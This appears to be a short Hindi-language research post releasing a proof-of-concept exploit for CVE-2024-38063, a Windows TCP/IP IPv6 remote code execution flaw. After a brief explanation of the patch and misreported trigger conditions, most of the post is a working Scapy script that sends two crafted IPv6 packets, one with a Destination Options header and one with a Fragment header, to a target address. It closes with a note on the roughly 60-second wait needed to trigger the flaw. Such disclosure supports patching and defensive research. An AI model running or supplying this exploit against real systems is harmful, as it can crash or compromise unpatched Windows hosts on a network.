
CVE-2024-38063 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एक Windows TCP/IP रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो डेस्टिनेशन ऑप्शन और फ्रैगमेंट हेडर के साथ दो क्राफ्टेड IPv6 पैकेट भेजने से ट्रिगर होती है।
अगस्त 2024 में, Microsoft ने Windows TCP/IP रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता के लिए एक पैच जारी किया। कुछ शोधकर्ताओं ने पहले ही इस भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) प्रकाशित कर दिए हैं, और लगभग उसी समय, PatchPoint शोधकर्ताओं ने भी इस मुद्दे का अपना विश्लेषण और पुनरुत्पादन पूरा कर लिया। विभिन्न प्लेटफार्मों, जिनमें Twitter भी शामिल है, पर गलत सूचना फैलने के कारण, ऐसा प्रतीत होता है कि इस भेद्यता को ट्रिगर करने के लिए आवश्यक महत्वपूर्ण बिंदुओं को गलत समझा गया है। इन अशुद्धियों के विपरीत, हमने एक ऐसा PoC जारी करने का निर्णय लिया है जो दर्शाता है कि केवल दो पैकेटों के प्रेषण से इस भेद्यता को कैसे ट्रिगर किया जा सकता है; वास्तव में, इस भेद्यता को ट्रिगर करने के लिए बड़ी संख्या में पैकेट आवश्यक नहीं हैं।
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

※ भेद्यता को ट्रिगर करने के लिए, लगभग 60 सेकंड की प्रतीक्षा समय आवश्यक है